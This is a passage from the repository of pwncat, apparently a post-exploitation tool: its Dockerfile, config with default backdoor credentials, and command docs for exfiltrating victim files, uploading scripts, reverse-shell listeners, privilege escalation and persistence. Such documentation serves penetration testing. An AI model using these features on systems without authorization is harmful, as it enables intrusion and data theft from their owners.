16 | - docs
17 |
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
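1 | # TODO(review): pin the base image to a digest (python:3.9-alpine@sha256:<digest>)
2 | # so a moved tag cannot silently change the build.
3 | FROM python:3.9-alpine AS builder
4 |
5 | # Build toolchain and headers needed to compile native wheels
6 | RUN set -eux \
7 |     && apk add --no-cache \
8 |         alpine-sdk \
9 |         libffi-dev \
10 |         linux-headers \
11 |         openssl-dev \
12 |         musl-dev \
13 |         cargo \
14 |         libstdc++
15 |
16 | # Upgrade packaging tools before copying the source so this layer stays cached
17 | # across source changes
18 | RUN set -eux \
19 |     && python -m pip install -U pip setuptools wheel setuptools_rust
20 |
21 | # Copy pwncat source (.dockerignore trims tests, docs and the local db/ directory)
22 | COPY . /opt/pwncat
23 |
24 | # Install pwncat into the builder's site-packages
25 | RUN set -eux \
26 |     && cd /opt/pwncat \
27 |     && pip install .
28 |
29 | FROM python:3.9-alpine AS final
30 |
31 | # Add libstdc++ and create the working directory
32 | RUN set -eux \
33 |     && apk add --no-cache libstdc++ \
34 |     && mkdir /work
35 |
36 | # Copy only the installed packages and console script from the builder image;
37 | # the build toolchain stays out of the final image
38 | COPY --from=builder /usr/local/lib/python3.9 /usr/local/lib/python3.9
39 | COPY --from=builder /usr/local/bin/pwncat-cs /usr/local/bin/pwncat-cs
40 |
41 | # Fetch plugins at build time so the image works without network access at run
42 | # time; this bakes downloaded content into the image, so rebuild to refresh it
43 | RUN pwncat-cs --download-plugins
44 |
45 | # Set working directory
46 | WORKDIR /work
47 |
48 | # Entrypoint is pwncat itself. NOTE(review): the container runs as root; a
49 | # non-root USER would need a way to bind low listener ports -- confirm before changing.
50 | ENTRYPOINT ["pwncat-cs"]
51 |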
45 |
--------------------------------------------------------------------------------
/LICENSE.md:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2021 Caleb Stewart
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/data/pwncat.pub:
--------------------------------------------------------------------------------
1 | ssh-rsa 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 pwncat@pwncat
2 |
--------------------------------------------------------------------------------
/data/pwncatrc:
--------------------------------------------------------------------------------
1 | # Set your remote hosts file
2 | set -g lhost "127.0.0.1"
3 | # Set your command prefix
4 | set -g prefix c-k
5 | # Set the default private key to use for privilege escalation (the keypair shipped in the repository's data/ directory is publicly known; generate your own)
6 | set -g privkey "data/pwncat"
7 | # Set the pwncat backdoor user and password (change these; the shipped defaults are publicly known)
8 | set -g backdoor_user "pwncat"
9 | set -g backdoor_pass "pwncat"
10 | set -g db "file://db/pwncat"
11 |
12 | set -g on_load {
13 | # Run a command upon a stable connection
14 | # privesc -l
15 | }
16 |
17 | # Examples of command bindings
18 | bind s "sync"
19 | bind c "set state command"
20 |
21 | # Create aliases for commands
22 | alias up upload
23 | alias down download
24 |
25 | # Shortcuts are single-character prefixes which cause the rest of the command
26 | # string to be passed as the arguments to a specific command. For example:
27 | # "!ls" runs "local ls" given the directives below
28 | shortcut ! local
29 | shortcut @ run
30 |
--------------------------------------------------------------------------------
/db/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/db/.gitkeep
--------------------------------------------------------------------------------
/docs/.gitignore:
--------------------------------------------------------------------------------
1 | build/
2 |
--------------------------------------------------------------------------------
/docs/Makefile:
--------------------------------------------------------------------------------
1 | # Minimal makefile for Sphinx documentation
2 | #
3 |
4 | # You can set these variables from the command line, and also
5 | # from the environment for the first two.
6 | SPHINXOPTS ?=
7 | SPHINXBUILD ?= python $(shell which sphinx-build)
8 | SOURCEDIR = source
9 | BUILDDIR = build
10 |
11 | # Put it first so that "make" without argument is like "make help".
12 | help:
13 | @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
14 |
15 | .PHONY: help Makefile
16 |
17 | # Catch-all target: route all unknown targets to Sphinx using the new
18 | # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS).
19 | %: Makefile
20 | @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
21 |
--------------------------------------------------------------------------------
/docs/apidoc/module.rst_t:
--------------------------------------------------------------------------------
1 | {%- if show_headings %}
2 | {{- [basename, "module"] | join(' ') | e | heading }}
3 |
4 | {% endif -%}
5 | .. automodule:: {{ qualname }}
6 | {%- for option in automodule_options %}
7 | :{{ option }}:
8 | {%- endfor %}
9 |
10 |
--------------------------------------------------------------------------------
/docs/apidoc/package.rst_t:
--------------------------------------------------------------------------------
1 | {%- macro automodule(modname, options) -%}
2 | .. automodule:: {{ modname }}
3 | {%- for option in options %}
4 | :{{ option }}:
5 | {%- endfor %}
6 | {%- endmacro %}
7 |
8 | {%- macro toctree(docnames) -%}
9 | .. toctree::
10 | :maxdepth: {{ maxdepth }}
11 | {% for docname in docnames %}
12 | {{ docname }}
13 | {%- endfor %}
14 | {%- endmacro %}
15 |
16 | {%- if pkgname == "pwncat" %}
17 | {{- "API Documentation" | e | heading }}
18 | {% else %}
19 | {%- if is_namespace %}
20 | {{- [pkgname, "namespace"] | join(" ") | e | heading }}
21 | {% else %}
22 | {{- [pkgname, "package"] | join(" ") | e | heading }}
23 | {% endif %}
24 | {% endif %}
25 |
26 | {%- if modulefirst and not is_namespace %}
27 | {{ automodule(pkgname, automodule_options) }}
28 | {% endif %}
29 |
30 | {%- if (subpackages+submodules) %}
31 | Modules and Packages
32 | --------------------
33 | {{ toctree(subpackages+submodules) }}
34 | {% endif %}
35 |
--------------------------------------------------------------------------------
/docs/apidoc/package.rst_t.bak:
--------------------------------------------------------------------------------
1 | {%- macro automodule(modname, options) -%}
2 | .. automodule:: {{ modname }}
3 | {%- for option in options %}
4 | :{{ option }}:
5 | {%- endfor %}
6 | {%- endmacro %}
7 |
8 | {%- macro toctree(docnames) -%}
9 | .. toctree::
10 | :maxdepth: {{ maxdepth }}
11 | {% for docname in docnames %}
12 | {{ docname }}
13 | {%- endfor %}
14 | {%- endmacro %}
15 |
16 | {%- if pkgname == "pwncat" %}
17 | {{- "API Documentation" | e | heading }}
18 | {% else %}
19 | {%- if is_namespace %}
20 | {{- [pkgname, "namespace"] | join(" ") | e | heading }}
21 | {% else %}
22 | {{- [pkgname, "package"] | join(" ") | e | heading }}
23 | {% endif %}
24 | {% endif %}
25 |
26 | {%- if modulefirst and not is_namespace %}
27 | {{ automodule(pkgname, automodule_options) }}
28 | {% endif %}
29 |
30 | {%- if subpackages %}
31 | Subpackages
32 | -----------
33 |
34 | {{ toctree(subpackages) }}
35 | {% endif %}
36 |
37 | {%- if submodules %}
38 | Submodules
39 | ----------
40 | {% if separatemodules %}
41 | {{ toctree(submodules) }}
42 | {% else %}
43 | {%- for submodule in submodules %}
44 | {% if show_headings %}
45 | {{- [submodule, "module"] | join(" ") | e | heading(2) }}
46 | {% endif %}
47 | {{ automodule(submodule, automodule_options) }}
48 | {% endfor %}
49 | {%- endif %}
50 | {%- endif %}
51 |
52 | {%- if not modulefirst and not is_namespace %}
53 | Module contents
54 | ---------------
55 |
56 | {{ automodule(pkgname, automodule_options) }}
57 | {% endif %}
58 |
--------------------------------------------------------------------------------
/docs/apidoc/toc.rst_t:
--------------------------------------------------------------------------------
1 | {{ header | heading }}
2 |
3 | .. toctree::
4 | :maxdepth: {{ maxdepth }}
5 | :hidden:
6 | {% for docname in docnames %}
7 | {{ docname }}
8 | {%- endfor %}
9 |
--------------------------------------------------------------------------------
/docs/make.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | REM Run from the directory containing this script so the relative
4 | REM SOURCEDIR/BUILDDIR paths below resolve regardless of the caller's cwd.
5 | pushd %~dp0
6 |
7 | REM Command file for Sphinx documentation
8 |
9 | REM SPHINXBUILD may be overridden from the environment; it is executed as-is
10 | REM below, so only point it at a trusted sphinx-build executable.
11 | if "%SPHINXBUILD%" == "" (
12 | set SPHINXBUILD=sphinx-build
13 | )
14 | set SOURCEDIR=source
15 | set BUILDDIR=build
16 |
17 | REM With no target given, show sphinx-build's help instead of failing.
18 | if "%1" == "" goto help
19 |
20 | REM Probe that sphinx-build is runnable; errorlevel 9009 means "command not found".
21 | %SPHINXBUILD% >NUL 2>NUL
22 | if errorlevel 9009 (
23 | echo.
24 | echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
25 | echo.installed, then set the SPHINXBUILD environment variable to point
26 | echo.to the full path of the 'sphinx-build' executable. Alternatively you
27 | echo.may add the Sphinx directory to PATH.
28 | echo.
29 | echo.If you don't have Sphinx installed, grab it from
30 | echo.http://sphinx-doc.org/
31 | exit /b 1
32 | )
33 |
34 | REM Delegate the requested target (%1) to sphinx-build's "make mode" (-M).
35 | %SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O%
36 | goto end
37 |
38 | :help
39 | %SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O%
40 |
41 | :end
42 | popd
43 |
--------------------------------------------------------------------------------
/docs/rebuild_api_docs.sh:
--------------------------------------------------------------------------------
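1 | #!/bin/sh
2 | # Regenerate the Sphinx API stubs under source/api from the pwncat package.
3 | # Abort on the first failing command and on any unset variable: the rm below
4 | # is destructive, so we must not carry on after a bad step.
5 | set -eu
6 |
7 | # Run relative to this script's own directory so the rm/apidoc paths below do
8 | # not depend on the caller's working directory (make.bat does the same with
9 | # pushd %~dp0). Previously, invoking this from elsewhere would remove a
10 | # different source/api/* than intended.
11 | cd "$(dirname "$0")"
12 |
13 | rm -rf source/api/*
14 |
15 | sphinx-apidoc -M -T -e -t ./apidoc -d -1 -f -o ./source/api ../pwncat ../pwncat/commands/[!_]* ../pwncat/channel/[!_]* ../pwncat/modules/*[!.][!p][!y]
16 |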
--------------------------------------------------------------------------------
/docs/source/api/pwncat.channel.rst:
--------------------------------------------------------------------------------
1 | pwncat.channel package
2 | ======================
3 |
4 |
5 | .. automodule:: pwncat.channel
6 | :members:
7 | :undoc-members:
8 | :show-inheritance:
9 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.commands.rst:
--------------------------------------------------------------------------------
1 | pwncat.commands package
2 | =======================
3 |
4 |
5 | .. automodule:: pwncat.commands
6 | :members:
7 | :undoc-members:
8 | :show-inheritance:
9 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.config.rst:
--------------------------------------------------------------------------------
1 | pwncat.config module
2 | ====================
3 |
4 | .. automodule:: pwncat.config
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.db.rst:
--------------------------------------------------------------------------------
1 | pwncat.db module
2 | ================
3 |
4 | .. automodule:: pwncat.db
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.facts.ability.rst:
--------------------------------------------------------------------------------
1 | pwncat.facts.ability module
2 | ===========================
3 |
4 | .. automodule:: pwncat.facts.ability
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.facts.implant.rst:
--------------------------------------------------------------------------------
1 | pwncat.facts.implant module
2 | ===========================
3 |
4 | .. automodule:: pwncat.facts.implant
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.facts.linux.rst:
--------------------------------------------------------------------------------
1 | pwncat.facts.linux module
2 | =========================
3 |
4 | .. automodule:: pwncat.facts.linux
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.facts.rst:
--------------------------------------------------------------------------------
1 | pwncat.facts package
2 | ====================
3 |
4 |
5 | .. automodule:: pwncat.facts
6 | :members:
7 | :undoc-members:
8 | :show-inheritance:
9 |
10 | Modules and Packages
11 | --------------------
12 | .. toctree::
13 | :maxdepth: -1
14 |
15 | pwncat.facts.ability
16 | pwncat.facts.implant
17 | pwncat.facts.linux
18 | pwncat.facts.tamper
19 | pwncat.facts.windows
20 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.facts.tamper.rst:
--------------------------------------------------------------------------------
1 | pwncat.facts.tamper module
2 | ==========================
3 |
4 | .. automodule:: pwncat.facts.tamper
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.facts.windows.rst:
--------------------------------------------------------------------------------
1 | pwncat.facts.windows module
2 | ===========================
3 |
4 | .. automodule:: pwncat.facts.windows
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.gtfobins.rst:
--------------------------------------------------------------------------------
1 | pwncat.gtfobins module
2 | ======================
3 |
4 | .. automodule:: pwncat.gtfobins
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.manager.rst:
--------------------------------------------------------------------------------
1 | pwncat.manager module
2 | =====================
3 |
4 | .. automodule:: pwncat.manager
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.modules.enumerate.rst:
--------------------------------------------------------------------------------
1 | pwncat.modules.enumerate module
2 | ===============================
3 |
4 | .. automodule:: pwncat.modules.enumerate
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.modules.implant.rst:
--------------------------------------------------------------------------------
1 | pwncat.modules.implant module
2 | =============================
3 |
4 | .. automodule:: pwncat.modules.implant
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.modules.rst:
--------------------------------------------------------------------------------
1 | pwncat.modules package
2 | ======================
3 |
4 |
5 | .. automodule:: pwncat.modules
6 | :members:
7 | :undoc-members:
8 | :show-inheritance:
9 |
10 | Modules and Packages
11 | --------------------
12 | .. toctree::
13 | :maxdepth: -1
14 |
15 | pwncat.modules.enumerate
16 | pwncat.modules.implant
17 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.platform.linux.rst:
--------------------------------------------------------------------------------
1 | pwncat.platform.linux module
2 | ============================
3 |
4 | .. automodule:: pwncat.platform.linux
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.platform.rst:
--------------------------------------------------------------------------------
1 | pwncat.platform package
2 | =======================
3 |
4 |
5 | .. automodule:: pwncat.platform
6 | :members:
7 | :undoc-members:
8 | :show-inheritance:
9 |
10 | Modules and Packages
11 | --------------------
12 | .. toctree::
13 | :maxdepth: -1
14 |
15 | pwncat.platform.linux
16 | pwncat.platform.windows
17 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.platform.windows.rst:
--------------------------------------------------------------------------------
1 | pwncat.platform.windows module
2 | ==============================
3 |
4 | .. automodule:: pwncat.platform.windows
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.rst:
--------------------------------------------------------------------------------
1 | API Documentation
2 | =================
3 |
4 | .. automodule:: pwncat
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
9 | Modules and Packages
10 | --------------------
11 | .. toctree::
12 | :maxdepth: -1
13 |
14 | pwncat.channel
15 | pwncat.commands
16 | pwncat.facts
17 | pwncat.modules
18 | pwncat.platform
19 | pwncat.config
20 | pwncat.db
21 | pwncat.gtfobins
22 | pwncat.manager
23 | pwncat.subprocess
24 | pwncat.target
25 | pwncat.util
26 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.subprocess.rst:
--------------------------------------------------------------------------------
1 | pwncat.subprocess module
2 | ========================
3 |
4 | .. automodule:: pwncat.subprocess
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.target.rst:
--------------------------------------------------------------------------------
1 | pwncat.target module
2 | ====================
3 |
4 | .. automodule:: pwncat.target
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.util.rst:
--------------------------------------------------------------------------------
1 | pwncat.util module
2 | ==================
3 |
4 | .. automodule:: pwncat.util
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/commands/alias.rst:
--------------------------------------------------------------------------------
1 | Alias
2 | =====
3 |
4 | ``alias`` is a simple command. It provides the ability to rename any built-in command. Unlike aliases in common shells,
5 | this does not allow you to provide default parameters to commands. Instead, it simply creates an alternative name.
6 |
7 | You can specify a new alias simply by providing the new name followed by the name of the existing command. For example, to alias "download"
8 | to "down", you could do this in your configuration script:
9 |
10 | .. code-block:: bash
11 |
12 | alias down "download"
13 |
14 | ``alias`` takes a string as its second argument. Passing anything else (e.g. a code block) will not produce the desired
15 | results. The command you are aliasing must exist and be a standard command (aliases to other aliases are not supported).
--------------------------------------------------------------------------------
/docs/source/commands/back.rst:
--------------------------------------------------------------------------------
1 | Back
2 | ====
3 |
4 | The back command is used to exit the local pwncat prompt and return to your remote shell. It is not expected to be
5 | used very often since the ``C-d`` shortcut is the primary method of switching. However, if you need to switch modes from
6 | a script, you can do so with this command. It takes no parameters and will immediately exit the pwncat shell to
7 | return to the remote prompt.
--------------------------------------------------------------------------------
/docs/source/commands/bind.rst:
--------------------------------------------------------------------------------
1 | Bind
2 | ====
3 |
4 | The bind command is used to create new keyboard shortcuts or change old ones. Keyboard shortcuts are accessed by first
5 | pressing your defined "prefix" key (by default: ``C-k``). ``bind`` takes two parameters: the key to bind, and the
6 | script to run when it is pressed.
7 |
8 | Key Selection
9 | -------------
10 |
11 | The key argument is specified as a string. If the string is a single character, it is assumed to be that literal printed
12 | character. For example, to bind the lowercase "a" key to a command you could:
13 |
14 | .. code-block:: bash
15 |
16 | bind "a" "some helpful command"
17 |
18 | If the key argument is longer than one character, it is assumed to be a key name. The key names accepted by pwncat
19 | are taken directly at runtime from the list of known ANSI keystrokes defined in the ``prompt_toolkit`` package. They
20 | use the same syntax as in prompt toolkit. All key names are lowercase. The prompt_toolkit documentation covers the
21 | keys supported by their module in their `documentation here`_. Any key defined by prompt_toolkit is available for
22 | key binding by pwncat.
23 |
24 | Script Content
25 | --------------
26 |
27 | The target of a key binding is a script. Scripts in pwncat can be specified as a string, which can only contain a
28 | single command, or as a code block surrounded by curly braces. When in code block mode, you can use as many commands
29 | as you like, and even insert comments, blank lines, etc.
30 |
31 | .. code-block:: bash
32 |
33 | bind "a" {
34 | # you can bind a series of commands which you
35 | # do very often to a key, if you find it helpful.
36 | privesc -l
37 | persist -s
38 | tamper
39 | }
40 |
41 | .. _`documentation here`: https://python-prompt-toolkit.readthedocs.io/en/master/pages/advanced_topics/key_bindings.html#list-of-special-keys
--------------------------------------------------------------------------------
/docs/source/commands/download.rst:
--------------------------------------------------------------------------------
1 | Download
2 | ========
3 |
4 | The ``download`` command provides an easy way to exfiltrate files from the victim. All file transfers are made over
5 | the same connection as your shell, and there are no HTTP or raw socket ports needed to make these transfers.
6 | File transfers are accomplished by utilizing the ``gtfobins`` framework to locate file readers on the victim host and
7 | write the contents back over the pipe. In some cases, this includes and requires encoding the data on the victim end
8 | and automatically decoding on the attacking host.
9 |
10 | The ``download`` command has a simple syntax which specifies the source and destination files only. The source file is
11 | a file on the remote host, which will be tab-completed at the pwncat prompt. The destination is a local file path
12 | on your local host which will be created (or overwritten if existing) with the content of the remote file.
13 |
14 | .. code-block:: bash
15 | :caption: Downloading the contents of /etc/hosts to a local file
16 |
17 | download /etc/hosts ./victim-hosts
18 |
19 |
--------------------------------------------------------------------------------
/docs/source/commands/escalate.rst:
--------------------------------------------------------------------------------
1 | Escalate
2 | ========
3 |
4 | The escalate command is used to perform automated escalation. As described in the privilege escalation
5 | section, this command is capable of performing recursive escalation across multiple users and sessions. It
6 | will also utilize any installed local implants as needed to escalate to the requested user.
7 |
8 | .. code-block:: bash
9 |
10 | # List direct escalations from the current user to any user
11 | escalate list
12 | # List direct escalations from the current user to root
13 | escalate list -u root
14 | # Attempt escalation by any means to root
15 | escalate run
16 | # Attempt escalation by any means to john
17 | escalate run -u john
18 |
--------------------------------------------------------------------------------
/docs/source/commands/index.rst:
--------------------------------------------------------------------------------
1 | Command index
2 | =============
3 |
4 | .. toctree::
5 | :caption: Contents
6 |
7 | alias.rst
8 | back.rst
9 | bind.rst
10 | connect.rst
11 | download.rst
12 | escalate.rst
13 | lcd.rst
14 | load.rst
15 | listen.rst
16 | listeners.rst
17 | lpwd.rst
18 | run.rst
19 | info.rst
20 | search.rst
21 | use.rst
22 | upload.rst
23 |
--------------------------------------------------------------------------------
/docs/source/commands/info.rst:
--------------------------------------------------------------------------------
1 | Info
2 | ====
3 |
4 | This command gets the documentation/help information for the specified
5 | module. This command has no other arguments or parameters. When called
6 | without a module name and within a module context, the documentation
7 | for the current module is displayed.
8 |
9 | .. code-block:: bash
10 |
11 | info enumerate.gather
12 |
--------------------------------------------------------------------------------
/docs/source/commands/lcd.rst:
--------------------------------------------------------------------------------
1 | lcd
2 | ===
3 |
4 | The ``lcd`` command allows you to change the *local* working directory of the running
5 | pwncat instance. This affects any command which interacts with the local filesystem
6 | (e.g. ``upload`` and ``download``).
7 |
8 | .. code-block:: bash
9 |
10 | # Example from @DanaEpp :P
11 | lcd ~/engagements/client_some_gawd_aweful_guid/host_abc/loot
12 | # Now, the following downloads will end up in the above directory
13 | download /path/to/some/loot
14 | download /path/to/some/other/loot
15 |
--------------------------------------------------------------------------------
/docs/source/commands/listen.rst:
--------------------------------------------------------------------------------
1 | Listen
2 | ======
3 |
4 | Create a new background listener to asynchronously establish sessions via a reverse shell payload. Background listeners can operate in two different modes: with a platform and without. If a platform type is not specified when creating a listener, channels will be queued within the listener until you initialize them with the ``listeners`` command.
5 |
6 | Using the ``--drop-duplicate`` option will cause pwncat to drop any new sessions which duplicate both the target host and user of an existing session. This could be useful when using an infinite reverse shell implant.
7 |
8 | Currently, listeners can only be used with the ``socket`` protocol, however listeners are capable of wrapping the socket server in an SSL context. A background listener can effectively replace the ``bind://`` and ``ssl-bind://`` protocols.
9 |
10 | The ``--count`` option can be used to restrict background listeners to a set number of active sessions. After reaching the number specified by ``--count``, the listener will automatically be stopped.
11 |
12 | .. code-block:: bash
13 |
14 | # Create a basic listener for linux sessions on port 9999
15 | listen -m linux 9999
16 | # Create an SSL listener for linux sessions on port 6666
17 | listen -m linux --ssl 9999
18 | # Create a listener with no platform which caches channels until initialization
19 | listen 8888
20 | # Create a listener which automatically exits after 4 established sessions
21 | listen --count 4 --platform windows 5555
22 |
--------------------------------------------------------------------------------
/docs/source/commands/listeners.rst:
--------------------------------------------------------------------------------
1 | Listeners
2 | =========
3 |
4 | The ``listeners`` command is used to manage active and stopped listeners. This command provides the capability to view listener configuration, stop active listeners, view failure messages, and initialize queued channels.
5 |
6 | When initializing a channel, you will be shown a list of pending channels, from which you can select one and specify a platform name. After specifying a platform, a session will be established with the channel and you will have the option of initializing other queued channels.
7 |
8 | .. code-block:: bash
9 | :caption: Interacting with Listeners
10 |
11 | # List only running and failed listeners
12 | listeners
13 | # List all listeners (running, stopped, and failed)
14 | listeners --all
15 | # Kill listener with ID 0
16 | listeners -k 0
17 | # View listener configuration (and failure message)
18 | listeners 0
19 | # Initialize pending channels
20 | listeners --init 0
21 |
--------------------------------------------------------------------------------
/docs/source/commands/load.rst:
--------------------------------------------------------------------------------
1 | Load
2 | ====
3 |
4 | This command allows you to load custom pwncat modules from a python package.
5 | The only parameter is the local path to a directory containing python packages
6 | to load as modules.
7 |
8 | pwncat will load all modules under that package and search for classes named
9 | ``Module`` implementing the ``BaseModule`` base class. These modules will be named
10 | based on the python package name relative to the specified directory. For example,
11 | if you had a directory called ``.pwncat-modules`` with this structure::
12 |
13 | - .pwncat-modules/
14 | - enumerate/
15 | - __init__.py
16 | - custom.py
17 | - __init__.py
18 |
19 | And a class named ``Module`` defined in ``custom.py`` then a new pwncat module
20 | would be available under the name ``enumerate.custom``.
21 |
22 | This command can be used in your configuration script to automatically load custom
23 | modules at runtime. Note that loading a package imports it, so any code it contains
24 | runs inside the pwncat process; only load module directories you trust.
24 |
25 | .. code-block:: bash
26 |
27 | # Load modules from /home/user/.pwncat-modules
28 | (local) pwncat$ load /home/user/.pwncat-modules
29 | (local) pwncat$ run enumerate.custom
30 |
--------------------------------------------------------------------------------
/docs/source/commands/lpwd.rst:
--------------------------------------------------------------------------------
1 | lpwd
2 | ====
3 |
4 | The ``lpwd`` command prints the current *local* working directory. This is the directory
5 | which commands like ``upload`` and ``download`` will interpret as ``.``.
6 |
7 | .. code-block:: bash
8 |
9 | # Print the local working directory
10 | lpwd
11 |
--------------------------------------------------------------------------------
/docs/source/commands/run.rst:
--------------------------------------------------------------------------------
1 | Run
2 | ===
3 |
4 | The ``run`` command gives you access to all pwncat modules at runtime. Most functionality in
5 | pwncat is implemented using modules. This includes privilege escalation, enumeration and
6 | persistence. You can locate modules using the ``search`` command or tab-complete their name
7 | with the ``run`` command.
8 |
9 | The ``run`` command is similar to the command with the same name in frameworks like Metasploit.
10 | The first argument to ``run`` is the name of the module you would like to execute. This takes
11 | the form of a Python fully-qualified package name. The default modules are within the ``pwncat/modules``
12 | directory, but others can be loaded with the ``load`` command.
13 |
14 | Modules may take arguments, which can be appended as key-value pairs to the end of a call to
15 | the ``run`` command:
16 |
17 | .. code-block:: bash
18 |
19 | # Enumerate setuid files on the remote host
20 | run enumerate.gather types=file.suid
21 |
22 |
23 | Required module arguments are first taken from these key-value pairs. If they aren't present,
24 | they are taken from the global configuration.
25 |
26 |
27 | Run Within A Context
28 | --------------------
29 |
30 | In pwncat, the ``use`` command can enter a module context. Within a module context, the
31 | pwncat prompt will change from "(local) pwncat$" to "(module_name) pwncat$". In this state,
32 | you can set module arguments with the ``set`` command. After the arguments are set, you can
33 | run the module with ``run``. Within a module context, no arguments are required for ``run``,
34 | however you are allowed to specify other key-value items as well. For example:
35 |
36 | .. code-block:: bash
37 |
38 | # Perform the same enumeration as seen above
39 | use enumerate.gather
40 | set types file.suid
41 | run
42 |
--------------------------------------------------------------------------------
/docs/source/commands/search.rst:
--------------------------------------------------------------------------------
1 | Search
2 | ======
3 |
4 | This command allows you to search for relevant modules which are currently imported
5 | into pwncat. This performs a glob-based search and provides an ellipsized
6 | description and module name in a nice table. The syntax is simple:
7 |
8 | .. code-block:: bash
9 |
10 | # Search for modules under the `enumerate` package
11 | (local) pwncat$ search enumerate.*
12 |
--------------------------------------------------------------------------------
/docs/source/commands/upload.rst:
--------------------------------------------------------------------------------
1 | Upload
2 | ======
3 |
4 | pwncat makes file upload easy through the ``upload`` command. File upload is accomplished via
5 | the ``gtfobins`` modules, which will enumerate available local binaries capable of writing printable
6 | or binary data to files on the remote host. Often, this is ``dd`` if available but could be any
7 | of the many binaries which ``gtfobins`` understands. The upload takes place over the same
8 | connection as your shell, which means you don't need another HTTP or socket server or extra connectivity
9 | to your target host.
10 |
11 | At the local pwncat prompt, local and remote files are tab-completed to provide an easier upload
12 | interface, and a progress bar is displayed.
13 |
14 | .. code-block:: bash
15 | :caption: Upload a script to the remote host
16 |
17 | upload ./malicious.sh /tmp/definitely-not-malicious
18 |
--------------------------------------------------------------------------------
/docs/source/commands/use.rst:
--------------------------------------------------------------------------------
1 | Use
2 | ===
3 |
4 | The ``use`` command can be *used* to enter the context of a module. When
5 | within a module context, the ``run``, ``set`` and ``info`` commands operate
6 | off of the module currently in the context.
7 |
8 | The use command simply takes the name of the module you would like to use
9 | and takes no other arguments or flags.
10 |
11 | .. code-block:: bash
12 |
13 | # Enter the context of the `enumerate.gather` module
14 | use enumerate.gather
15 | # Get information/help for this module
16 | info
17 | # Run the module
18 | run
19 |
--------------------------------------------------------------------------------
/docs/source/enum.rst:
--------------------------------------------------------------------------------
1 | Enumeration
2 | ===========
3 |
4 | Enumeration in pwncat is achieved through the ``enumerate.*`` modules. All these modules
5 | implement a sub-class of the standard pwncat module. Each enumeration can be run
6 | individually or you can use one of the automated enumeration groups. Enumeration modules can
7 | specify their "schedule" which affects when they are run. By default, enumeration modules
8 | run only once and their results are cached in the database. Some modules specify a "per-user"
9 | schedule which means they run once per user. A smaller number of modules specify an "always"
10 | schedule which means that every time you run the module it will execute that enumeration
11 | regardless of any cached entries.
12 |
13 |
14 | Gathering Enumeration Data
15 | --------------------------
16 |
17 | The base ``enumerate`` module is an alias of ``enumerate.gather``. This module is used to
